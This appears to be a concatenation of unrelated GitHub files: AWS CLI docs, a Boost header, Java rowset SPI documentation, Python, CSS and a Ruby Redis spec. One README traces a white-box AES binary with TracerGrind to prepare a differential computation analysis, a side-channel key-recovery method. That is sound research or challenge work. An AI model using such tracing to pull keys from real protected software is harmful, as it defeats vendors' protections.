"pile_set_name": "Github"
} |
**To get channel configuration information about multiple channels**
The following ``batch-get-channel`` example lists information about the specified channels. ::
aws ivs batch-get-channel \
--arns arn:aws:ivs:us-west-2:123456789012:channel/abcdABCDefgh \
arn:aws:ivs:us-west-2:123456789012:channel/ijklMNOPqrst
Output::
{
"channels": [
{
"arn": "arn:aws:ivs:us-west-2:123456789012:channel/abcdABCDefgh",
"name": "channel-1",
"latencyMode": "LOW",
"ingestEndpoint": "a1b2c3d4e5f6.global-contribute.live-video.net",
"playbackUrl": "https://a1b2c3d4e5f6.us-west-2.playback.live-video.net/api/video/v1/us-west-2.123456789012.channel.abcdEFGH.m3u8",
"tags": {}
},
{
"arn": "arn:aws:ivs:us-west-2:123456789012:channel/abcdABCDefgh",
"name": "channel-2",
"latencyMode": "LOW",
"ingestEndpoint": "a1b2c3d4e5f6.global-contribute.live-video.net",
"playbackUrl": "https://a1b2c3d4e5f6.us-west-2.playback.live-video.net/api/video/v1/us-west-2.123456789012.channel.abcdEFGH.m3u8",
"tags": {}
}
]
}
For more information, see `Create a Channel <https://docs.aws.amazon.com/ivs/latest/userguide/GSIVS-create-channel.html>`__ in the *Amazon Interactive Video Service User Guide*. | {
"pile_set_name": "Github"
} |
## Usage
## Acquiring one trace with TracerPIN
```bash
Tracer -t sqlite -- ../target/encryptECB -key ../target/key.txt -in <(echo 000102030405060708090a0b0c0d0e0f|xxd -r -p) -out >(xxd -p)
```
The program exits too early for an unknown reason. So we'll switch to TracerGrind.
## Acquiring one trace with TracerGrind
By default TracerGrind traces everything, so let's find the address range of the main executable and apply an address filter.
```bash
objdump -p ../target/encryptECB |grep -A1 LOAD|grep -B1 "r.x"
LOAD off 0x0000000000000000 vaddr 0x0000000000400000 paddr 0x0000000000400000 align 2**12
filesz 0x00000000000e3810 memsz 0x00000000000e3810 flags r-x
valgrind --tool=tracergrind --filter=0x400000-0x500000 --output=xiaolai.trace ../target/encryptECB -key ../target/key.txt -in <(echo 000102030405060708090a0b0c0d0e0f|xxd -r -p) -out >(xxd -p)
sqlitetrace xiaolai.trace xiaolai.sqlite
```
Sqlite trace is about 500Mb large.
## Visualizing
Just fire tracegraph and load the sqlite trace:
```
tracegraph xiaolai.sqlite &
```
We may guess the AES is located at the bottom, where we see 10 successive large data reads.
Instructions are localized in several columns so for DCA we'll have to try each column:
* 0x40e2fe-0x40f025
* 0x43b12f-0x43b2ba
* 0x4755ba-0x475c90
* 0x4bcc50-0x4bd367
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#if !defined(FUSION_INSERT_10022005_1837)
#define FUSION_INSERT_10022005_1837
#include <boost/fusion/support/config.hpp>
#include <boost/mpl/insert.hpp>
#include <boost/fusion/support/tag_of.hpp>
#include <boost/fusion/algorithm/transformation/insert.hpp>
#include <boost/fusion/sequence/convert.hpp>
namespace boost { namespace mpl
{
template <typename Tag>
struct insert_impl;
template <>
struct insert_impl<fusion::fusion_sequence_tag>
{
template <typename Sequence, typename Pos, typename T>
struct apply
{
typedef typename
fusion::result_of::insert<Sequence, Pos, T>::type
result;
typedef typename
fusion::result_of::convert<
typename fusion::detail::tag_of<Sequence>::type, result>::type
type;
};
};
}}
#endif
| {
"pile_set_name": "Github"
} |
<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR"
content="Mozilla/4.79 [en] (Windows NT 5.0; U) [Netscape]">
<!--
Copyright (c) 2003, 2010, Oracle and/or its affiliates. All rights reserved.
DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
This code is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License version 2 only, as
published by the Free Software Foundation. Oracle designates this
particular file as subject to the "Classpath" exception as provided
by Oracle in the LICENSE file that accompanied this code.
This code is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
version 2 for more details (a copy is included in the LICENSE file that
accompanied this code).
You should have received a copy of the GNU General Public License version
2 along with this work; if not, write to the Free Software Foundation,
Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
or visit www.oracle.com if you need additional information or have any
questions.
-->
<title>javax.sql.rowset.spi</title>
</head>
<body bgcolor="#ffffff">
The standard classes and interfaces that a third party vendor has to
use in its implementation of a synchronization provider. These classes and
interfaces are referred to as the Service Provider Interface (SPI). A vendor may
have its implementation included on the JDBC web page that lists available
<code>SyncProvider</code> implementations by sending email to <code>[email protected]</code>.
Doing this helps make developers aware of the implementation. To make it possible
for a <code>RowSet</code> object to use an implementation, the vendor must register
it with the <code>SyncFactory</code> singleton. (See the class comment for
<code>SyncProvider</code> for a full explanation of the registration process and
the naming convention to be used.)
<P>
<h2>Table of Contents</h2>
<ul>
<li><a href="#pkgspec">1.0 Package Specification</a>
<li><a href="#arch">2.0 Service Provider Architecture</a>
<li><a href="#impl">3.0 Implementer's Guide</a>
<li><a href="#resolving">4.0 Resolving Synchronization Conflicts</a>
<li><a href="#relspec">5.0 Related Specifications</a>
<li><a href="#reldocs">6.0 Related Documentation</a>
</ul>
<h3><a name="pkgspec">1.0 Package Specification</h3>
<P>
The following classes and interfaces make up the <code>javax.sql.rowset.spi</code>
package:
<UL>
<LI><code>SyncFactory</code>
<LI><code>SyncProvider</code>
<LI><code>SyncFactoryException</code>
<LI><code>SyncProviderException</code>
<LI><code>SyncResolver</code>
<LI><code>XmlReader</code>
<LI><code>XmlWriter</code>
<LI><code>TransactionalWriter</code>
</UL>
The following interfaces, in the <code>javax.sql</code> package, are also part of the SPI:
<UL>
<LI><code>RowSetReader</code>
<LI><code>RowSetWriter</code>
</UL>
<P>
A <code>SyncProvider</code> implementation provides a disconnected <code>RowSet</code>
object with the mechanisms for reading data into it and for writing data that has been
modified in it
back to the underlying data source. A <i>reader</i>, a <code>RowSetReader</code> or
<code>XMLReader</code> object, reads data into a <code>RowSet</code> object when the
<code>CachedRowSet</code> methods <code>execute</code> or <code>populate</code>
are called. A <i>writer</i>, a <code>RowSetWriter</code> or <code>XMLWriter</code>
object, writes changes back to the underlying data source when the
<code>CachedRowSet</code> method <code>acceptChanges</code> is called.
<P>
The process of writing changes in a <code>RowSet</code> object to its data source
is known as <i>synchronization</i>. The <code>SyncProvider</code> implementation that a
<code>RowSet</code> object is using determines the level of synchronization that the
<code>RowSet</code> object's writer uses. The various levels of synchronization are
referred to as <i>grades</i>.
<P>
The lower grades of synchronization are
known as <i>optimistic</i> concurrency levels because they optimistically
assume that there will be no conflicts or very few conflicts. A conflict exists when
the same data modified in the <code>RowSet</code> object has also been modified
in the data source. Using the optimistic concurrency model means that if there
is a conflict, modifications to either the data source or the <code>RowSet</code>
object will be lost.
<P>
Higher grades of synchronization are called <i>pessimistic</i> because they assume
that others will be accessing the data source and making modifications. These
grades set varying levels of locks to increase the chances that no conflicts
occur.
<P>
The lowest level of synchronization is simply writing any changes made to the
<code>RowSet</code> object to its underlying data source. The writer does
nothing to check for conflicts.
If there is a conflict and the data
source values are overwritten, the changes other parties have made by to the data
source are lost.
<P>
The <code>RIXMLProvider</code> implementation uses the lowest level
of synchronization and just writes <code>RowSet</code> changes to the data source.
This is true because typically XML data sources do not enable transaction
techniques for maintaining the integrity of data. However, specific standards
groups have considered offering XML-based synchronization. For details, see
<PRE>
<a href="http://www.syncml.org">http://www.syncml.org</a>
</PRE>
<P>
For the the next level up, the
writer checks to see if there are any conflicts, and if there are,
it does not write anything to the data source. The problem with this concurrency
level is that if another party has modified the corresponding data in the data source
since the <code>RowSet</code> object got its data,
the changes made to the <code>RowSet</code> object are lost. The
<code>RIOptimisticProvider</code> implementation uses this level of synchronization.
<P>
At higher levels of synchronization, referred to as pessimistic concurrency,
the writer take steps to avoid conflicts by setting locks. Setting locks
can vary from setting a lock on a single row to setting a lock on a table
or the entire data source. The level of synchronization is therefore a tradeoff
between the ability of users to access the data source concurrently and the ability
of the writer to keep the data in the <code>RowSet</code> object and its data source
synchronized.
<P>
It is a requirement that all disconnected <code>RowSet</code> objects
(<code>CachedRowSet</code>, <code>FilteredRowSet</code>, <code>JoinRowSet</code>,
and <code>WebRowSet</code> objects) obtain their <code>SyncProvider</code> objects
from the <code>SyncFactory</code> mechanism.
<P>
The reference implementation (RI) provides two synchronization providers.
<UL>
<LI><b><tt>RIOptimisticProvider</tt></b> <br>
The default provider that the <code>SyncFactory</code> instance will
supply to a disconnected <code>RowSet</code> object when no provider
implementation is specified.<BR>
This synchronization provider uses an optimistic concurrency model,
assuming that there will be few conflicts among users
who are accessing the same data in a database. It avoids
using locks; rather, it checks to see if there is a conflict
before trying to synchronize the <code>RowSet</code> object and the
data source. If there is a conflict, it does nothing, meaning that
changes to the <code>RowSet</code> object are not persisted to the data
source.
<LI><B><tt>RIXMLProvider</tt></B> <BR>
A synchronization provider that can be used with a
<code>WebRowSet</code> object, which is a rowset that can be written
in XML format or read from XML format. The
<code>RIXMLProvider</code> implementation does no checking at all for
conflicts and simply writes any updated data in the
<code>WebRowSet</code> object to the underlying data source.
<code>WebRowSet</code> objects use this provider when they are
dealing with XML data.
</UL>
These <code>SyncProvider</code> implementations
are bundled with the reference implementation, which makes them always available to
<code>RowSet</code> implementations.
<code>SyncProvider</code> implementations make themselves available by being
registered with the <code>SyncFactory</code> singleton. When a <code>RowSet</code>
object requests a provider, by specifying it in the constructor or as an argument to the
<code>CachedRowSet</code> method <code>setSyncProvider</code>,
the <code>SyncFactory</code> singleton
checks to see if the requested provider has been registered with it.
If it has, the <code>SyncFactory</code> creates an instance of it and passes it to the
requesting <code>RowSet</code> object.
If the <code>SyncProvider</code> implementation that is specified has not been registered,
the <code>SyncFactory</code> singleton causes a <code>SyncFactoryException</code> object
to be thrown. If no provider is specified,
the <code>SyncFactory</code> singleton will create an instance of the default
provider implementation, <code>RIOptimisticProvider</code>,
and pass it to the requesting <code>RowSet</code> object.
<P>
If a <code>WebRowSet</code> object does not specify a provider in its constructor, the
<code>SyncFactory</code> will give it an instance of <code>RIOptimisticProvider</code>.
However, the constructor for <code>WebRowSet</code> is implemented to set the provider
to the <code>RIXMLProvider</code>, which reads and writes a <code>RowSet</code> object
in XML format.
<P>
See the <a href="SyncProvider.html">SyncProvider</a> class
specification for further details.
<p>
Vendors may develop a <tt>SyncProvider</tt> implementation with any one of the possible
levels of synchronization, thus giving <code>RowSet</code> objects a choice of
synchronization mechanisms. A vendor can make its implementation available by
registering the fully qualified class name with Oracle Corporation at
<code>[email protected]</code>. This process is discussed in further detail below.
<P>
<a name="arch"><h3>2.0 Service Provider Interface Architecture</h3>
<ul>
<b>2.1 Overview</b>
<p>
The Service Provider Interface provides a pluggable mechanism by which
<code>SyncProvider</code> implementations can be registered and then generated when
required. The lazy reference mechanism employed by the <code>SyncFactory</code> limits
unnecessary resource consumption by not creating an instance until it is
required by a disconnected
<code>RowSet</code> object. The <code>SyncFactory</code> class also provides
a standard API to configure logging options and streams that <b>may</b> be provided
by a particular <code>SyncProvider</code> implementation.
<p>
<b>2.2 Registering with the <code>SyncFactory</code></b>
<p>
A third party <code>SyncProvider</code> implementation must be registered with the
<code>SyncFactory</code> in order for a disconnected <code>RowSet</code> object
to obtain it and thereby use its <code>javax.sql.RowSetReader</code> and
<code>javax.sql.RowSetWriter</code>
implementations. The following registration mechanisms are available to all
<code>SyncProvider</code> implementations:
<ul>
<li><b>System properties</b> - Properties set at the command line. These
properties are set at run time and apply system-wide per invocation of the Java
application. See the section <a href="#reldocs">"Related Documentation"</a>
further related information.
<p>
<li><b>Property Files</b> - Properties specified in a standard property file.
This can be specified using a System Property or by modifying a standard
property file located in the platform run-time. The
reference implementation of this technology includes a standard property
file than can be edited to add additional <code>SyncProvider</code> objects.
<p>
<li><b>JNDI Context</b> - Available providers can be registered on a JNDI
context. The <tt>SyncFactory</tt> will attempt to load <tt>SyncProvider</tt>
objects bound to the context and register them with the factory. This
context must be supplied to the <code>SyncFactory</code> for the mechanism to
function correctly.
</ul>
<p>
Details on how to specify the system properties or properties in a property file
and how to configure the JNDI Context are explained in detail in the
<a href="SyncFactory.html"><code>SyncFactory</code></a> class description.
<p>
<b>2.3 SyncFactory Provider Instance Generation Policies</b>
<p>
The <code>SyncFactory</code> generates a requested <code>SyncProvider</code>
object if the provider has been correctly registered. The
following policies are adhered to when either a disconnected <code>RowSet</code> object
is instantiated with a specified <code>SyncProvider</code> implementation or is
reconfigured at runtime with an alternative <code>SyncProvider</code> object.
<ul>
<li> If a <code>SyncProvider</code> object is specified and the <code>SyncFactory</code>
contains <i>no</i> reference to the provider, a <code>SyncFactoryException</code> is
thrown.
<p>
<li> If a <code>SyncProvider</code> object is specified and the <code>SyncFactory</code>
contains a reference to the provider, the requested provider is supplied.
<p>
<li> If no <code>SyncProvider</code> object is specified, the reference
implementation provider <code>RIOptimisticProvider</code> is supplied.
</ul>
<p>
These policies are explored in more detail in the <a href="SyncFactory.html">
<code>SyncFactory</code></a> class.
</ul>
<li><a name="impl"><h3>3.0 SyncProvider Implementer's Guide</h3>
<ul>
<b>3.1 Requirements</b>
<p>
A compliant <code>SyncProvider</code> implementation that is fully pluggable
into the <code>SyncFactory</code> <b>must</b> extend and implement all
abstract methods in the <a href="SyncProvider.html"><code>SyncProvider</code></a>
class. In addition, an implementation <b>must</b> determine the
grade, locking and updatable view capabilities defined in the
<code>SyncProvider</code> class definition. One or more of the
<code>SyncProvider</code> description criteria <b>must</b> be supported. It
is expected that vendor implementations will offer a range of grade, locking, and
updatable view capabilities.
<p>
Furthermore, the <code>SyncProvider</code> naming convention <b>must</b> be followed as
detailed in the <a href="SyncProvider.html"><code>SyncProvider</code></a> class
description.
<p>
<b>3.2 Grades</b>
<p>
JSR 114 defines a set of grades to describe the quality of synchronization
a <code>SyncProvider</code> object can offer a disconnected <code>RowSet</code>
object. These grades are listed from the lowest quality of service to the highest.
<ul>
<li><b>GRADE_NONE</b> - No synchronization with the originating data source is
provided. A <code>SyncProvider</code> implementation returning this grade will simply
attempt to write any data that has changed in the <code>RowSet</code> object to the
underlying data source, overwriting whatever is there. No attempt is made to compare
original values with current values to see if there is a conflict. The
<code>RIXMLProvider</code> is implemented with this grade.
<p>
<li><b>GRADE_CHECK_MODIFIED_AT_COMMIT</b> - A low grade of optimistic synchronization.
A <code>SyncProvider</code> implementation returning this grade
will check for conflicts in rows that have changed between the last synchronization
and the current synchronization under way. Any changes in the originating data source
that have been modified will not be reflected in the disconnected <code>RowSet</code>
object. If there are no conflicts, changes in the <code>RowSet</code> object will be
written to the data source. If there are conflicts, no changes are written.
The <code>RIOptimisticProvider</code> implementation uses this grade.
<p>
<li><b>GRADE_CHECK_ALL_AT_COMMIT</b> - A high grade of optimistic synchronization.
A <code>SyncProvider</code> implementation returning this grade
will check all rows, including rows that have not changed in the disconnected
<code>RowSet</code> object. In this way, any changes to rows in the underlying
data source will be reflected in the disconnected <code>RowSet</code> object
when the synchronization finishes successfully.
<p>
<li><b>GRADE_LOCK_WHEN_MODIFIED</b> - A pessimistic grade of synchronization.
<code>SyncProvider</code> implementations returning this grade will lock
the row in the originating data source that corresponds to the row being changed
in the <code>RowSet</code> object to reduce the possibility of other
processes modifying the same data in the data source.
<p>
<li><b>GRADE_LOCK_WHEN_LOADED</b> - A higher pessimistic synchronization grade.
A <code>SyncProvider</code> implementation returning this grade will lock
the entire view and/or table affected by the original query used to
populate a <code>RowSet</code> object.
</ul>
<p>
<b>3.3 Locks</b>
<p>
JSR 114 defines a set of constants that specify whether any locks have been
placed on a <code>RowSet</code> object's underlying data source and, if so,
on which constructs the locks are placed. These locks will remain on the data
source while the <code>RowSet</code> object is disconnected from the data source.
<P>
These constants <b>should</b> be considered complementary to the
grade constants. The default setting for the majority of grade settings requires
that no data source locks remain when a <code>RowSet</code> object is disconnected
from its data source.
The grades <code>GRADE_LOCK_WHEN_MODIFIED</code> and
<code>GRADE_LOCK_WHEN_LOADED</code> allow a disconnected <code>RowSet</code> object
to have a fine-grained control over the degree of locking.
<ul>
<li><b>DATASOURCE_NO_LOCK</b> - No locks remain on the originating data source.
This is the default lock setting for all <code>SyncProvider</code> implementations
unless otherwise directed by a <code>RowSet</code> object.
<p>
<li><b>DATASOURCE_ROW_LOCK</b> - A lock is placed on the rows that are touched by
the original SQL query used to populate the <code>RowSet</code> object.
<p>
<li><b>DATASOURCE_TABLE_LOCK</b> - A lock is placed on all tables that are touched
by the query that was used to populate the <code>RowSet</code> object.
<p>
<li><b>DATASOURCE_DB_LOCK</b>
A lock is placed on the entire data source that is used by the <code>RowSet</code>
object.
</ul>
<p>
<b>3.4 Updatable Views</b>
<p>
A <code>RowSet</code> object may be populated with data from an SQL <code>VIEW</code>.
The following constants indicate whether a <code>SyncProvider</code> object can
update data in the table or tables from which the <code>VIEW</code> was derived.
<ul>
<li><b>UPDATABLE_VIEW_SYNC</b>
Indicates that a <code>SyncProvider</code> implementation supports synchronization
to the table or tables from which the SQL <code>VIEW</code> used to populate a
a <code>RowSet</code> object is derived.
<p>
<li><b>NONUPDATABLE_VIEW_SYNC</b>
Indicates that a <code>SyncProvider</code> implementation does <b>not</b> support
synchronization to the table or tables from which the SQL <code>VIEW</code>
used to populate a <code>RowSet</code> object is derived.
</ul>
<p>
<b>3.5 Usage of <code>SyncProvider</code> Grading and Locking</b>
<p>
In the example below, the reference <tt>CachedRowSetImpl</tt> implementation
reconfigures its current <tt>SyncProvider</tt> object by calling the
<tt>setSyncProvider</tt> method.<br>
<PRE>
CachedRowSetImpl crs = new CachedRowSetImpl();
crs.setSyncProvider("com.foo.bar.HASyncProvider");
</PRE>
An application can retrieve the <tt>SyncProvider</tt> object currently in use
by a disconnected <code>RowSet</code> object. It can also retrieve the
grade of synchronization with which the provider was implemented and the degree of
locking currently in use. In addition, an application has the flexibility to set
the degree of locking to be used, which can increase the possibilities for successful
synchronization. These operation are shown in the following code fragment.
<PRE>
SyncProvider sync = crs.getSyncProvider();
switch (sync.getProviderGrade()) {
case: SyncProvider.GRADE_CHECK_ALL_AT_COMMIT
//A high grade of optimistic synchronization
break;
case: SyncProvider.GRADE_CHECK_MODIFIED_AT_COMMIT
//A low grade of optimistic synchronization
break;
case: SyncProvider.GRADE_LOCK_WHEN_LOADED
// A pessimistic synchronization grade
break;
case: SyncProvider.GRADE_LOCK_WHEN_MODIFIED
// A pessimistic synchronization grade
break;
case: SyncProvider.GRADE_NONE
// No synchronization with the originating data source provided
break;
}
switch (sync.getDataSourcLock() {
case: SyncProvider.DATASOURCE_DB_LOCK
// A lock is placed on the entire datasource that is used by the
// <code>RowSet</code> object
break;
case: SyncProvider.DATASOURCE_NO_LOCK
// No locks remain on the originating data source.
break;
case: SyncProvider.DATASOURCE_ROW_LOCK
// A lock is placed on the rows that are touched by the original
// SQL statement used to populate
// the RowSet object that is using the SyncProvider
break;
case: DATASOURCE_TABLE_LOCK
// A lock is placed on all tables that are touched by the original
// SQL statement used to populated
// the RowSet object that is using the SyncProvider
break;
</PRE>
It is also possible using the static utility method in the
<code>SyncFactory</code> class to determine the list of <code>SyncProvider</code>
implementations currently registered with the <code>SyncFactory</code>.
<pre>
Enumeration e = SyncFactory.getRegisteredProviders();
</pre>
</ul>
<h3><a name="resolving">4.0 Resolving Synchronization Conflicts</h3>
The interface <code>SyncResolver</code> provides a way for an application to
decide manually what to do when a conflict occurs. When the <code>CachedRowSet</code>
method <code>acceptChanges</code> finishes and has detected one or more conflicts,
it throws a <code>SyncProviderException</code> object. An application can
catch the exception and
have it retrieve a <code>SyncResolver</code> object by calling the method
<code>SyncProviderException.getSyncResolver()</code>.
<P>
A <code>SyncResolver</code> object, which is a special kind of
<code>CachedRowSet</code> object or
a <code>JdbcRowSet</code> object that has implemented the <code>SyncResolver</code>
interface, examines the conflicts row by row. It is a duplicate of the
<code>RowSet</code> object being synchronized except that it contains only the data
from the data source this is causing a conflict. All of the other column values are
set to <code>null</code>. To navigate from one conflict value to another, a
<code>SyncResolver</code> object provides the methods <code>nextConflict</code> and
<code>previousConflict</code>.
<P>
The <code>SyncResolver</code> interface also
provides methods for doing the following:
<UL>
<LI>finding out whether the conflict involved an update, a delete, or an insert
<LI>getting the value in the data source that caused the conflict
<LI>setting the value that should be in the data source if it needs to be changed
or setting the value that should be in the <code>RowSet</code> object if it needs
to be changed
</UL>
<P>
When the <code>CachedRowSet</code> method <code>acceptChanges</code> is called, it
delegates to the <code>RowSet</code> object's <code>SyncProvider</code> object.
How the writer provided by that <code>SyncProvider</code> object is implemented
determines what level (grade) of checking for conflicts will be done. After all
checking for conflicts is completed and one or more conflicts has been found, the method
<code>acceptChanges</code> throws a <code>SyncProviderException</code> object. The
application can catch the exception and use it to obtain a <code>SyncResolver</code> object.
<P>
The application can then use <code>SyncResolver</code> methods to get information
about each conflict and decide what to do. If the application logic or the user
decides that a value in the <code>RowSet</code> object should be the one to
persist, the application or user can overwrite the data source value with it.
<P>
The comment for the <code>SyncResolver</code> interface has more detail.
<a name="relspec"><h3>5.0 Related Specifications</h3>
<ul>
<li><a href="http://java.sun.com/products/jndi">JNDI 1.3</a>
<li><a href="{@docRoot}/../technotes/guides/logging/index.html">Java Logging
APIs</a>
</ul>
<a name="reldocs"><h3>6.0 Related Documentation</h3>
<ul>
<li><a href="{@docRoot}/../technotes/tools/index.html#basic">System
properties</a>
<li>Resource Files
<li><a href="http://java.sun.com/tutorial/jdbc">DataSource for JDBC
Connections</a>
</ul>
</body>
</html>
| {
"pile_set_name": "Github"
} |
from ctypes import *
RESULT_OK, RESULT_FALSE, RESULT_ERROR = (0, 1, -1)
class POINT(Structure):
"""
POINT represents a point with two variables, x and y.
POINT is mainly used for Python <-> MML communication.
"""
_fields_ = [('x', c_int),
('y', c_int)]
class MMLException(Exception):
def __init__(self, err):
Exception.__init__(self, err)
#class PascalArray(object):
# """
# PascalArray is a class that allows one to easily use a Pascal-style
# array. It has been changed to fit my own Pascal-style arrays. (The
# length is no longer stored at -1, but at 0, and the data starts at 1.)
# This makes freeing the data much easier.
#
# The implementation is limited to reading and writing data.
# It cannot resize arrays nor can it create them.
#
# This class is more like a temporary solution to passing arrays and such.
# The actual user should not be bothered by the external memory, so most
# likely we will simply turn this data into python lists. The only
# drawback would be the overhead created by doing so.
# """
# def __init__(self, pastype, ptr, MC):
# """
# Set the type of the data we are holding to _pastype_,
# save the pointer _ptr_ and store the reference to the MMLCore.
# """
# self._type = pastype
# self._p = ptr
# self._mc = MC
#
# def __del__(self):
# """
# Free the array. Perhaps we should do reference counting on the
# pointer?
# """
# self._mc.dll.fpc_freemem_(self._p)
#
# def __len__(self):
# """
# Return the length of the array.
# """
# return cast(self._p, POINTER(c_ulong))[0]
#
# def __getitem__(self, pos):
# """
# Get an item at a specific position _pos_.
# """
# if pos > len(self):
# print 'Out of range'
# return None
# return cast(self._p, POINTER(self._type))[pos+1]
#
# def __setitem__(self, pos, item):
# """
# Set an item at a specific position _pos_.
# """
# if pos > len(self):
# print 'Out of range'
# return
# if sizeof(item) != sizeof(self._type):
# print 'Incorrect structure'
# return
# cast(self._p, POINTER(self._type))[pos] = item
PPOINT = POINTER(POINT)
PINTEGER = POINTER(c_int)
isiterable = lambda x: hasattr(x, '__iter__')
| {
"pile_set_name": "Github"
} |
.tooltipster-punk {
border-radius: 5px;
border-bottom: 3px solid #f71169;
background: #2a2a2a;
color: #fff;
}
.tooltipster-punk .tooltipster-content {
font-family: 'Courier', monospace;
font-size: 14px;
line-height: 16px;
padding: 8px 10px;
} | {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
require 'spec_helper'
describe "Stealth::Redis" do
class RedisTester
include Stealth::Redis
end
let(:redis_tester) { RedisTester.new }
let(:key) { 'xyz' }
describe "get_key" do
it "should return the key from Redis if an expiration is not set" do
$redis.set(key, 'abc')
expect(redis_tester.send(:get_key, key)).to eq 'abc'
end
it "should call getex if an expiration is set" do
expect(redis_tester).to receive(:getex).with(key, 30)
redis_tester.send(:get_key, key, expiration: 30)
end
end
describe "delete_key" do
it 'should delete the key from Redis' do
$redis.set(key, 'abc')
expect(redis_tester.send(:get_key, key)).to eq 'abc'
redis_tester.send(:delete_key, key)
expect(redis_tester.send(:get_key, key)).to be_nil
end
end
describe "getex" do
it "should return the key from Redis" do
Stealth.config.session_ttl = 50
$redis.set(key, 'abc')
expect(redis_tester.send(:getex, key)).to eq 'abc'
end
it "should set the expiration of a key in Redis" do
Stealth.config.session_ttl = 50
$redis.set(key, 'abc')
redis_tester.send(:getex, key)
expect($redis.ttl(key)).to be_between(0, 50).inclusive
end
it "should update the expiration of a key in Redis" do
Stealth.config.session_ttl = 500
$redis.setex(key, 50, 'abc')
redis_tester.send(:getex, key)
expect($redis.ttl(key)).to be_between(400, 500).inclusive
end
end
describe "persist_key" do
it "should set the key in Redis" do
Stealth.config.session_ttl = 50
redis_tester.send(:persist_key, key: key, value: 'zzz')
expect($redis.get(key)).to eq 'zzz'
end
it "should set the expiration to session_ttl if none specified" do
Stealth.config.session_ttl = 50
redis_tester.send(:persist_key, key: key, value: 'zzz')
expect($redis.ttl(key)).to be_between(0, 50).inclusive
end
it "should set the expiration to the specified value when provided" do
Stealth.config.session_ttl = 50
redis_tester.send(:persist_key, key: key, value: 'zzz', expiration: 500)
expect($redis.ttl(key)).to be_between(400, 500).inclusive
end
end
end
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.